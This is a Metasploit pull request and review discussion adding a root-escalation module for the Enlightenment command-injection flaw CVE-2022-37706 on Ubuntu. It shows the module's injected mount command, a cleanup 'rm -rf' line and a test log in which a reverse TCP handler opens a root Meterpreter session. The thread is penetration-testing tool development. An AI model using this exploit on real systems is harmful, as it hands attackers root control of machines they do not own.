### PR TITLE
CVE-2022-37706 Enlightenment linux priv esc

### LINKED ISSUE #17022: Ubuntu Enlightenment LPE (CVE-2022-37706)
https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit

### PR DESCRIPTION
**Pull request by h00die**
Fixes #17022 

@MaherAzzouzi just wanted to let you know this module is up for inclusion in metasploit. thanks for an excellent writeup and PoC!

This PR adds a local priv esc for Enlightenment on Ubuntu.  It most likely works on other flavors of linux, but I only tested against Ubuntu 22.04.  It's a simple cmd injection after you add in all the cruft for passing checks required to get it to execute.

@smcintyre-r7 just want to call to your attention this was an 0day 2 weeks ago, and at the time of writing is unpatched on Ubuntu 22.04.1, so you may want to spin up a VM and at least `apt install` the package so its easy to test against when whoever has time.

## Verification

- [ ] install app, hopefully just with an `apt install`
- [ ] Start `msfconsole`
- [ ] get a userland shell, I used `ssh_login`
- [ ] `use exploits/linux/local/ubuntu_enlightenment_mount_priv_esc`
- [ ] set lhost/session/etc
- [ ] **Verify** you elevate to a root shell
- [ ] **Document** looks good

### CODE REVIEW

**Comment by MaherAzzouzi** [comment]
Thank you for your feedback and for including the poc in Metasploit!

File: modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb [hunk 1]
```diff
@@ -0,0 +1,129 @@
...
+
+    print_status('Creating folders for exploit')
+    cmd_exec('rm -rf /tmp/net; mkdir -p /tmp/net')
+    cmd_exec("mkdir -p \"#{dev_path}\"")
+    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+    # output from the exploit being run, they can optionally see it
+    enlightenment_sys = find_enlightenment_sys
+    print_status 'Launching exploit...'
+    timeout = 10
+    cmd_exec("#{enlightenment_sys} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \"#{dev_path}\" /tmp///net", nil, timeout)
```
Comment (jheysel-r7) [inline modules/exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.rb:127]: Would it make sense to make this timeout user configurable?/  Just use `datastore['WfsDelay']`?
```suggestion
    cmd_exec("#{enlightenment_sys} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \"#{dev_path}\" /tmp///net", nil, datastore['WfsDelay'])
```

**Review by jheysel-r7 — COMMENTED** [review]
Thanks @h00die! Testing checks out on my end. 🚀 Just a two minor suggestions 
```
msf6 exploit(linux/local/ubuntu_enlightenment_mount_priv_esc) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Finding enlightenment_sys
[*] Writing '/tmp/.r2CqH' (282 bytes) ...
[*] Creating folders for exploit
[*] Launching exploit...
[*] Sending stage (3045348 bytes) to 172.16.199.130
[+] Deleted /tmp/.r2CqH
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:54506) at 2022-10-03 15:04:34 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.16.199.130
OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```

File: documentation/modules/exploit/linux/local/ubuntu_enlightenment_mount_priv_esc.md [hunk 2]
```diff
@@ -0,0 +1,124 @@
...
+`enlightenment_sys` binary. This is done by calling the mount
+command and feeding it paths which meet all of the system
+requirements, but execute a specific path as well due to a
+semi-colon being used.
+This module was tested on Ubuntu 22.04.1 X64 Desktop with
+enlightenment 0.25.3-1 (current at module write time)
+
+### Install
+
+At the time of writing, it was possible to `apt install enlightmentent` to
```
[the remark this answers is not in the document]
Comment (h00die) [reply documentation/modules/exploit/linux/local/ubuntu_enlightenment_mount_priv_esc.md:13]: yikes.

**Comment by h00die** [comment]
changed, re-tested on my end, all good.

**Comment by MaherAzzouzi** [comment]
@h00die Thank you for your efforts trying to understand the exploit and trying to include it in Metasploit.
I really appreciate your work!

**Comment by jheysel-r7** [comment]
# Release Notes

This PR adds a local privilege escalation module. It exploits a cmd injection vulnerability in the window manager, Enlightenment, on Ubuntu.

**Pull request merged**